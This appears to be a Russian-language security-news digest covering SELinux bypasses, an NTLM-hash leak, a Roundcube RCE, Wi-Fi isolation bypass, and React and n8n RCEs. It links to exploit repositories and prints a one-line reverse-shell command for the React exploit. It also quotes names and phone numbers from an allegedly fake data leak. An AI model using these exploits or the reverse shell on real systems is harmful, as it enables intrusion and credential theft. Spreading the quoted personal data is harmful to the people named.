SELinux bypasses

Даже если ты повысился и теперь у тебя есть доступ к учетке с root-правами, включенный SELinux может помешать свободно перемещаться по системе, запускать бинари и читать нужные файлы.

SELinux — это модуль безопасности ядра Linux, который следит за тем, какие программы и пользователи могут выполнять определённые действия.

Он работает по строгим правилам и может запрещать доступ даже root-пользователю, если что-то нарушает эти правила.

1. What is SELinux
1.1 Linux Security Module
1.2 Mandatory Access Control
1.3 SELinux policy
1.4 Example denial
2. Implementation overview
3. Bypasses
3.1. Disable SELinux
3.2. Overwrite permissive map
3.3. Overwrite AVC cache
3.4. SELinux initialization
4.5. Overwrite mapping
3.6. Remove hooks
4. Conclusion
5. References

В этой статье собраны способы обхода его политик

Fixing Rendering Bugs in Dead Rising PC

Фанат первой части Dead Rising так хотел перепройти любимую игру, что решил не дожидаться официального ремастера и выкатил свой собственный фикс для ошибки с вылетом, которую не могли исправить на протяжении 15 лет.

В статье много технических деталей по написанию фанатского патча.

crackmy.app

Появился новый сайт с набором разных крякми. По количество тасок уже немного обходит знаменитый crackmes.one, — на данный момент их более 4000.

Эксплойт за $200 000

Microsoft присвоила идентификатор CVE-2025-24054 зеродею, который за несколько сотен тысяч долларов продавал krypt0n на XSS.

krypt0n

сейчас проясню все. Сервак в который летят хеши создается у себя. К примеру на впс. Дальше через эксплойт генерируешь конфиг с твоими ip, share и т.д после этого создается специальный конфиг. Кладешь его на шару в любое место, независит куда именно. И если пользователь просто откроет проводник или эту шару то автоматически произойдет редирект сам (идет редирект запроса) тем самым хеш пользователя прилетает к вам на сервер и все. Сам файл который лежит на шаре открывать НЕ нужно

Сам эксплойт — это .library-ms файл с адресом шары, на который проводник отправит NTLM-хэш, как файл появится на тачке.

poc // research

Раньше подобное можно было провернуть с .ico и .ini. Все способы собраны в этой репе https://github.com/Gl3bGl4z/All_NTLM_leak, советую сохранить.

It's Over

Чуваки из Oligo Security нашли 17 уязвимостей в протоколе AirPlay от Apple.

Самая критичная CVE-2025-24132 позволяет получить шелл на другом устройстве мгновенно, без взаимодействия с пользователем. Надо только находиться в одной сети, и чтобы у цели был включен этот самый AirPlay, — на Mac он работает по умолчанию.

Сам протокол нужен, чтобы удаленно включать музыку/видео. Он есть не только у Mac, iPhone, Apple TV, — его используют миллионы умных устройств разных вендоров по всему миру, а еще — больше 800 марок автомобилей.

В X (ex. Twitter) уже многие называют это багом года.

PoC

На схеме пример, как можно сдампить токен админа без SQL-инъекции.

Уязвимость называется ORM Leak, и находят ее в последнее время все чаще и чаще, — вот, например, в Label Studio (система для разметки данных), и в двух крупных CMS — Payload CMS (CVE-2023-30843), и Strapi (CVE-2023-22894).

Возникает, когда разработчики хотят добавить гибкий поиск на сайте по разным полям. И чтобы не описывать каждое поле отдельно, делают фильтрацию динамической.

Тем самым допуская ошибку, благодаря которой в запросе можно прокинуть lookup expressions (пишутся через подчеркивания, и позволяют использовать разные фильтры). Дальше — выйти за пределы дефолтной таблички и, наконец, извлечь данные из БД, по аналогии с Boolean-based Blind.

Учитывая, что сейчас проще найти сервис, который использует не сырой SQL, а "безопасный ORM" — попадаться будет часто.

Подробнее можно почитать здесь Ransacking your password reset tokens, а тут посмотреть много примеров кода plORMbing your Django ORM.

free money

С 5 по 7 июня пройдет CTF, где за призовые места дарят деньги.

Проводит Patchstack Alliance — группа в дискорде, участники которой ищет уязвимости в Wordpress и его плагинах, так что скорее всего задания будут как-то связаны с этой CMS.

За первое место дают $1000, а решить придется всего около 9 тасок.

Регистрация уже открыта https://ctf.patchstack.com/.

🔥 9.9 Critical
Post Auth RCE для Roundсube

Небезопасная десериализация. Инжектится через GET-параметр _from, — в Roundcube он указывает на раздел, куда надо вернуться, после отправки сообщения.

?_task=settings&_action=upload&_from=mail%2Finbox

Пошагово, как работает эксплоит:
1. Подменяет _from сериализованным объектом.
2. Заинжекченное значение подтягивается в сессию.
3. Дальше оно обрабатывается через rcube_pgp_engine → Crypt_GPG_Engine.
4. Во время вызова GPG-логики, Roundcube вызывает unserialize().
5. Триггерится код из первого шага

exploit // nuclei // research

В Киеве арестовали админа российского даркнет-форума

В результате длительного расследования, проведенного французскими властями в сотрудничестве украинскими правоохранительными органами и Европолом, был арестован администратор xss.is, одной из самых влиятельных русскоязычных платформ киберпреступности в мире.

За 20 лет своей незаконной деятельности киберпреступник заработал более 7 млн. евро.

Hello, у меня есть полный дамп max[.]ru, там ровно 46203590 строк, и у меня все еще есть VPN-доступ к их salesforce и другим внутренним инструментам.

Titusko25357 с DarkForums заявил о том, что он хакнул "самый безопасный мессенджер" и готов продать базу всех бедолаг, общий объем которой насчитывает более 45кк строк.

Цену не сообщил, но в треде и во всех новостных каналах уже начали это активно обсуждать, вот некоторые комментарии:

Hello, i'm from Russia, mb I'm in this databaseXD. U legend dawg.

вот тут верю, вот тут плюс, верю, уже верю. Да, поверил. Да, я поверил, да, а шо? Да, да я, да, поверил, да, я, а шо?

Кто бы чё не пиздел но некоторые номера довольно таки валидные :))
Думайте. Поздняков. Подписаться

neokoder справедливо заметил, что Salesforce ушел еще в 2022 году

all the big companies in russia ditched salesforce back in 2022 when the first wave of sanctions hit. salesforce completely stopped doing business there

А еще несколько юзеров отписали, что данные не бьются с настоящими

Кому интересно, можете себе макс скачать, на рандом симку врегать.

Там по номеру мобильного можно перейти на чела (кнопка найти по номеру), ни один из номеров не бьется, с текстом по типу: «Еще не зарегистрирован в Max, пригласите его».

lmao
'Ольга', 'Новикова', '+79265478963', = Мингбоев Мухамадали
'Катерина', 'Бойко', '+79502804153', = Перова Евгения
nice fake db leak lol

Скорее всего, данные — ИИ слоп, а тема создана для скама или просто троллинга. Можно было бы засомневаться и поверить в обратное, если бы не нулевая репа топик стартера, сомнительный сэмпл и косяк с Salesforce.

В Тайланде местная киберполиция вместе с FBI задержали российского офицера ГРУ Алексея Лукашева, одного из участников группы Fancy Bear, которого обвиняют во вмешательстве в американские выборы.

Страница розыска на сайте ФБР https://www.fbi.gov/wanted/cyber/aleksey-viktorovich-lukashev.

Чем он занимался:
— в 2014 и 2015 годах участвовал во взломе Бундестага
— в 2016 организовывал фишинговые атаки против сотрудников штаба Хиллари Клинтон (например, рассылал поддельные уведомления Google о смене пароля)
— действовал как офицер-координатор, распределяя задачи между остальными хакерами, управлял C2-сервером X-Agent
— под его руководством было слито больше 50 000 конфиденциальных документов на сайт dcleaks.com

И это только то, что удалось явно доказать. Более подробно можно почитать в самом обвинении Минюста, и в Muller Report, отчете бывшего директора ФБР Роберта Мюллера.

UPD.: CNN пишет, что хакера зовут Денис Обрезко, по их словам, это сотрудник ФСБ и участник группы Laundry Bear (Void Blizzard).

Одна строчка кода на Rust сломала весь интернет

Cloudflare выпустили разбор вчерашнего инцидента. Выяснилось, что у них лег сервис Bot Management, который используют для защиты от DDoS.

Архитектура этого сервиса устроена так, есть
1. Clickhouse, где Cloudflare хранит список правил для защиты от ботов
2. Cron-скрипт, который вычитывает БД, и генерирует список правил для раскатки на серверы
3. Скрипт на Rust, на самих серверах, который берет правила и применяет их

На первом этапе инженеры внесли изменение в Clickhouse, в результате которых на втором шаге создался список правил в 2 раза больше, чем обычно.

На этапе 3 скрипт понял, что файл превышает лимиты размера, и споткнулся об .unwrap(), который отправил его в panic и аварийно завершил работу (вместо того, чтобы проигнорировать "плохой" список) на всех инстансах по всему миру.

Сначала в Cloudflare думали, что это атака нового ботнета Aisuru, который недавно поставил рекорд мощностью 15 Tbps. Но в результате ошибки инженеров самой компании полегло куча сервисов, включая X/Twitter, ChatGPT, Spotify, Canva, и McDonald's.

Ваши фото счетчиков под угрозой

Плохие новости от GrapheneOS — создатели приватной прошивки пишут о том, что французские силовики проплатили медиа, чтобы дискредитировать проект.

Причина в том, что даже софт от Cellebrite не может справиться с "операционкой", поэтому местные полицейские начали давить на GrapheneOS с просьбой внедрить бэкдор, под предлогом борьбы с наркотиками.

Создатели проекта, конечно, отказали, и теперь вынуждены поспешно мигрировать всю инфраструктуру (сервера обновлений, главный сайт, форум) с французского хостинга OVHcloud в США, Англию, и Канаду.

Кстати, именно французские власти начали изначально пушить инициативу "EU Chat Control" в ЕС со сканированием личных сообщений. Более того, за отказ разблокировать смартфон во Франции можно получить уголовку, от 3-х до 5-ти лет.

Когда подключаешься к WiFi где-нибудь в коворкинге и пытаешься просканить хосты, можно ничего не найти из-за их изоляции. Pulse Security рассказали о том, как ее можно обойти.

Дело в том, что изоляция работает на уровне роутера, запрос идет так: твой ПК => роутер => ПК другого клиента. В этой схеме роутер отбрасывает все, что ты пытаешься отправить кому-то в сети во время сканирования.

Но радиоволна не знает про изоляцию. Кадр, который отправляешь в эфир, физически доходит до всех. Чтобы обойти изоляцию, достаточно создать 802.11 кадр с флагом From-DS-1 (прикинувшись роутером) и отправить его напрямую клиенту, а затем прослушать эфир на наличие ответа.

Это касается незашифрованных сетей. Но способ будет работать и для WPA2-CCMP-PSK, который используется повсеместно. Достаточно провести DeAuth, перехватить хэндшейк, вычислить Temporal Key (ключ шифрования), и установить соединение с клиентом, а дальше по описанной схеме.

PoC уже выложили на GitHub, а в самой статье показали рабочий пример скана с nmap и подключение к VNC на другой тачке.

🔥 10/10 React4shell

В официальном блоге React только что выкатили пост про CVE-2025-55182, которая позволяет в один запрос получить RCE. Уязвимы версии 19.0.0, 19.1.0, 19.1.1, 19.2.0, а еще фреймворки Next.JS, Vite, Parcel, и Waku.

Just when I thought the day was over… CVE-2025-55182 shows up 🫠

Сам баг находится в RSC-рантайме, который принимает данные и небезопасно десериализует их. Запатчиться сейчас почти никто не успел, а уязвимость можно считать одной из самых критичных, которые находили в React за все время.

Рабочий эксплоит

Спустя сутки после тряски с нейрослопом, его, наконец, написали https://github.com/Spritualkb/CVE-2025-55182-exp (сырой запрос можно найти тут). Работает на любом уязвимом приложении из коробки, я уже проверил сам.

Получить шелл в одну команду можно так

python3 exp.py http://127.0.0.1:3000 --revshell 127.0.0.1 1234

Предварительно надо не забыть поднять слушатель (не смотря на надпись, сам скрипт этого не делает).

Сейчас в интернете находится 8.7 миллионов потенциально уязвимых инстансов, — 69% всех облачных сред используют Next.js — это каждый второй прод в облаке.

Чтобы не проверять их все вручную, для Burp написали готовое расширение, которое проверяет уязвимость в фоне https://github.com/tobiasGuta/Next.js-RSC-RCE-Scanner-Burp-Suite-Extension (в active scan++ тоже добавили)

n8n RCE CVE-2025-68613

Любой пользователь может исполнять код на сервере, достаточно создать воркфлоу как на скрине.

Уязвимы версии:
— от 0.211.0 до 1.120.3
— 1.121.0

Эксплойт: https://github.com/wioui/n8n-CVE-2025-68613-exploit